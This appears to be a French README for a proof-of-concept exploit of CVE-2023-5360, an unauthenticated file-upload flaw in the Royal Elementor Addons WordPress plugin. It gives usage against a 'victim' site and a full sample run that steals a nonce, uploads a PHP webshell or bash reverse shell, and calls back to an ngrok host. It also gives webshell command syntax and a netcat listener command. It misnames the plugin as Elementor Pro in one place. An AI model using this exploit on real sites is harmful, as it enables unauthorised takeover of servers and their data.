
Royal Elementor Addons - Exécution de code à distance non authentifiée
Le plugin WordPress Royal Elementor Addons and Templates avant la version 1.3.79 ne valide pas correctement les fichiers téléchargés, ce qui pourrait permettre à des utilisateurs non authentifiés de télécharger des fichiers arbitraires, tels que des fichiers PHP, et d'obtenir une exécution de code à distance (RCE).
_______ ________
/ ____/ | / / ____/
/ / | | / / __/______
/ /___ | |/ /__/_____/
\____/ |___/_____/_____
|__ \ / __ \__ \|__ /
__/ // / / /_/ / /_ <
/ __// /_/ / __/___/ /
/____/\____/____/____/____
/ ____/__ // ___// __ \
/___ \ /_ </ __ \/ / / /
____/ /___/ / /_/ / /_/ /
/_____//____/\____/\____/
par X3RX3S
Ceci est une preuve de concept pour CVE-2023-5360, une vulnérabilité de téléchargement de fichiers dans Elementor Pro pour WordPress. Elle permet à un attaquant non authentifié de télécharger des fichiers PHP arbitraires et d'obtenir une exécution de code à distance.
python3 CVE-2023-5360.py <https://victim.site/>
Exemple :
python3 CVE-2023-5360.py https://victim.site/
_______ ________
/ ____/ | / / ____/
/ / | | / / __/______
/ /___ | |/ /__/_____/
\____/ |___/_____/_____
|__ \ / __ \__ \|__ /
__/ // / / /_/ / /_ <
/ __// /_/ / __/___/ /
/____/\____/____/____/____
/ ____/__ // ___// __ \
/___ \ /_ </ __ \/ / / /
____/ /___/ / /_/ / /_/ /
/_____//____/\____/\____/
github.com/X3RX3SSec
by X3RX3S aka @mindfuckerrrr
[+] Target: https://victim.site
[+] Elementor page: https://victim.site)
[*] Step 1: Grabbing Elementor nonce...
[+] HTTP 200 received from target
[+] Nonce extracted: fdcb5015cd
[*] Step 2: Configure payload
[1] Simple command webshell
[2] Reverse shell (bash)
[?] Choose payload [1/2]: 2
[?] LHOST (your IP): 7.tcp.eu.ngrok.io
[?] LPORT (your PORT): 31337
[+] Reverse shell payload generated for 7.tcp.eu.ngrok.io:31337
[?] Start built-in listener? [Y/n]: Y
[+] Starting local listener on 7.tcp.eu.ngrok.io:31337...
[*] Attempt 1 of 3: Uploading payload via AJAX exploit...
[>] POST https://victim.site/wp-admin/admin-ajax.php
listening on [any] 31337 ...
[+] HTTP 200 from upload handler
[+] Shell uploaded: https://victim.site/wp-content/uploads/wpr-addons/forms/shell-6253.php
[*] Triggering reverse shell. Have your listener ready!
[+] Trigger sent (timeout is normal for reverse shell).
[+] Arrr! Cannons fired. Check your listener! 🏴☠️💣
Options de payload :
?cmd=id sous la forme : https://victim.site/wp-content/uploads/wpr-addons/forms/shell.php?cmd=id)requestsInstallation des dépendances :
pip install requests
nc -lvnp 1337
Cet exploit est destiné à des fins éducatives et de tests de sécurité autorisés uniquement. Vous êtes responsable de la façon dont vous l'utilisez. Testez uniquement sur des systèmes dont vous êtes propriétaire ou pour lesquels vous avez l'autorisation.
Auteur : X3RX3S CVE-2023-5360